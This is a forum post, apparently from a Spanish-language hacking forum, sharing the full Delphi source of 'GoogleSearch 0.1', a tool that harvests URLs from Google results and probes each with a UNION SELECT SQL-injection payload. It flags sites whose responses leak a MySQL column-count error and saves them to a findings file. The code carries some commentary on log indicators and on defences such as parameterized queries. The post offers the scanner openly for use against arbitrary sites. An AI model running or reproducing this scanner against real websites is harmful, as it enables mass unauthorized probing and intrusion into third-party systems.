[Delphi] GoogleSearch 0.1

Iniciado por BigBear, 7 Junio 2013, 18:29 PM


BigBear

Un programa simple para buscar páginas vulnerables a SQLi usando Google.

Una imagen :



El código:


// Google Search 0.1
// Coded By Doddy H

unit goo;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sSkinManager, IdURI, sMemo, PerlRegEx,
  IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, jpeg,
  ExtCtrls, sEdit, sLabel, sGroupBox, sListBox, ComCtrls, sStatusBar, ShellApi,
  IdContext, IdCmdTCPClient;

type
  // Main (and only) form of the unit. The published fields below are the
  // components streamed from the .dfm (not shown here); the comments describe
  // how the handlers in this unit use them.
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager; // UI skin, configured in FormCreate
    IdHTTP1: TIdHTTP;             // single HTTP client shared by the search and the scan
    PerlRegEx1: TPerlRegEx;       // result-link regex (search) / error-string match (scan)
    PerlRegEx2: TPerlRegEx;       // extracts the target of a "/url?q=" redirect link
    Image1: TImage;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sLabel2: TsLabel;
    sEdit1: TsEdit;               // search query text (read in sButton1Click)
    sEdit2: TsEdit;               // number of result pages to request (StrToInt in sButton1Click)
    sGroupBox2: TsGroupBox;
    sListBox1: TsListBox;         // candidate URLs collected by the search
    sGroupBox3: TsGroupBox;
    sGroupBox4: TsGroupBox;
    sListBox2: TsListBox;         // URLs whose response contained the database error string
    sStatusBar1: TsStatusBar;     // Panels[0] carries the progress text
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    PerlRegEx3: TPerlRegEx;       // cuts a URL after its first '='
    procedure sButton1Click(Sender: TObject);     // run the search and fill sListBox1
    procedure FormCreate(Sender: TObject);        // skin setup, create and enter the logs directory
    procedure sListBox1DblClick(Sender: TObject); // open google-search.txt
    procedure sListBox2DblClick(Sender: TObject); // open sqli-founds.txt
    procedure sButton4Click(Sender: TObject);     // close the form
    procedure sButton3Click(Sender: TObject);     // show the contact message
    procedure sButton2Click(Sender: TObject);     // probe every URL in sListBox1

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  // Global form instance. Several handlers below address the form through
  // this variable (Form1.sStatusBar1, Form1.Close) instead of through Self.
  Form1: TForm1;

implementation

{$R *.dfm}

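// Appends one line of text to a file, creating the file if it does not exist.
//
//   filename - path of the file; a relative name resolves against the
//              current directory.
//   texto    - the line to write (a line terminator is added by Writeln).
//
// I/O failures raise the usual RTL exception (EInOutError with I/O checking
// on); the file is closed before the exception propagates.
procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  // NOTE(review): FileMode is a process-wide RTL variable; this assignment is
  // kept from the original and stays in effect after the call returns.
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  // The file is open from here on: guarantee CloseFile even when Writeln
  // fails (disk full, handle revoked), otherwise the handle stays open and
  // the next Append on the same file fails.
  try
    Writeln(ar, texto);
  finally
    CloseFile(ar);
  end;

end;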

// Form start-up: activates the 'falloutstyle' skin from <exe dir>Data, then
// makes <exe dir>/logs the current directory (creating it when missing), so
// the relative file names used by the other handlers land in that folder.
procedure TForm1.FormCreate(Sender: TObject);
var
  exeDir: string;
  logDir: string;
begin
  // ExtractFilePath keeps the trailing path delimiter.
  exeDir := ExtractFilePath(Application.ExeName);

  sSkinManager1.SkinDirectory := exeDir + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;

  logDir := exeDir + '/logs';
  if not DirectoryExists(logDir) then
    CreateDir(logDir); // result ignored; a failure surfaces in ChDir below

  ChDir(logDir);
end;

// Search handler: requests sEdit2 pages of Google results for the text in
// sEdit1, reduces every result URL to the part up to and including its first
// '=', shows the reduced URLs in sListBox1 and appends them to
// google-search.txt in the current directory.
//
// Nothing in this handler is guarded: StrToInt raises EConvertError when
// sEdit2 is not a number, and any exception from IdHTTP1.Get propagates out
// of the handler and aborts the run.
procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  link2: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  target: string;
  linkfinalfinal: string;
  chau: TStringList;

begin

  // Empty flag set: only the first space becomes '+'. No other URL encoding
  // is applied to the query text.
  target := StringReplace(sEdit1.text, ' ', '+', []);

  sListBox1.Items.Clear;

  for i := 1 to StrToInt(sEdit2.text) do
  begin
    // Result offset sent as the "start" parameter: 10, 20, 30, ...
    ii := i * 10;

    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;

    // Plain-HTTP request; the whole result page is held in memory as a string.
    code := IdHTTP1.Get('http://www.google.com/search?hl=&q=' + target +
        '&start=' + IntToStr(ii));

    // Captures the href value of the anchor that follows a class "r" marker
    // in the result markup.
    PerlRegEx1.Regex := '(?<="r"><. href=")(.+?)"';
    PerlRegEx1.Subject := code;

    while PerlRegEx1.MatchAgain do
    begin
      // The loop body is the single assignment below, so link1 ends up
      // holding the last sub-expression of the current match.
      for z := 1 to PerlRegEx1.SubExpressionCount do

        link1 := PerlRegEx1.SubExpressions[z];

      // Result links are redirect links of the form /url?q=<target>&amp;...
      PerlRegEx2.Regex := '\/url\?q\=(.*?)\&amp\;';
      PerlRegEx2.Subject := link1;

      if PerlRegEx2.Match then
      begin
        link2 := PerlRegEx2.SubExpressions[1];
        linkfinal := TIdURI.URLDecode(link2);
        sListBox1.Update;

        // Keeps only URLs that contain '='; group 1 is everything before the
        // first one.
        PerlRegEx3.Regex := '(.*?)=(.*?)';

        PerlRegEx3.Subject := linkfinal;

        if PerlRegEx3.Match then
        begin
          // Stored form: the URL cut right after its first '=' (the value of
          // the first query parameter is dropped).
          linkfinalfinal := PerlRegEx3.SubExpressions[1] + '=';
          sListBox1.Items.Add(linkfinalfinal);
        end;

      end;
    end;
  end;

  // Round trip through a sorted list that ignores duplicates, then back into
  // the list box.
  // NOTE(review): chau is never freed in this handler, so every click leaks
  // one TStringList.
  chau := TStringList.Create;

  chau.Duplicates := dupIgnore;
  chau.Sorted := True;
  chau.Assign(sListBox1.Items);
  sListBox1.Items.Clear;
  sListBox1.Items.Assign(chau);

  // savefile appends, so google-search.txt accumulates entries across runs;
  // the file is re-opened once per line.
  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('google-search.txt', sListBox1.Items[i]);
  end;

  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;

end;

// Scan handler: sends one GET per entry of sListBox1 with a fixed UNION
// SELECT suffix appended, and records the entry in sListBox2 and in
// sqli-founds.txt when the response body contains MySQL's
// "different number of columns" error text.
//
// Seen from the receiving server: a single request per URL in which the
// value of the first query parameter is the literal "-1+union+select+1--".
// That literal is constant, so an access-log search or a WAF rule can match
// it directly. The check can only succeed when the application sends raw
// database error text back to the client; parameterized queries remove the
// injection itself, and generic error pages remove the signal this handler
// looks for.
// NOTE(review): the .dfm is not shown. Unless it overrides
// IdHTTP1.Request.UserAgent, Indy's default "Mozilla/3.0 (compatible; Indy
// Library)" is sent, which is a second log indicator - confirm against the
// form file.
procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;

begin

  sListBox2.Items.Clear;

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin

        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;

        // Entries end in '=' (see sButton1Click), so the suffix becomes the
        // parameter value.
        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');

        // The pattern contains no regex metacharacters, so this is a plain
        // substring test on the response body.
        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;

        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;

      end;
    except
      // Every failure (HTTP error status, connection error, file error from
      // savefile) is discarded and the loop moves on to the next entry.
      on E: EIdHttpProtocolException do
        ;
      on E: Exception do
        ;
    end;

    // NOTE(review): still inside the for loop, so '[+] Done' is written after
    // every entry, not once at the end.
    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;

  end;

end;

// Shows the author's contact address in a modal message box.
procedure TForm1.sButton3Click(Sender: TObject);
const
  ContactText = 'Contact to lepuke[at]hotmail[com]';
begin
  ShowMessage(ContactText);
end;

// Closes the form through the global Form1 reference.
procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close;
end;

// Double-click on the candidate list: opens the search log with the shell's
// default handler. The name is relative, so it resolves against the current
// directory, which FormCreate set to the logs folder.
procedure TForm1.sListBox1DblClick(Sender: TObject);
const
  ResultsFile = 'google-search.txt';
begin
  ShellExecute(Handle, 'open', PChar(ResultsFile), nil, nil, SW_SHOWNORMAL);
end;

// Double-click on the findings list: opens the findings log with the shell's
// default handler. The name is relative, so it resolves against the current
// directory, which FormCreate set to the logs folder.
procedure TForm1.sListBox2DblClick(Sender: TObject);
const
  FindingsFile = 'sqli-founds.txt';
begin
  ShellExecute(Handle, 'open', PChar(FindingsFile), nil, nil, SW_SHOWNORMAL);
end;

end.

// The End ?


Si quieren bajar el programa, lo pueden hacer desde acá.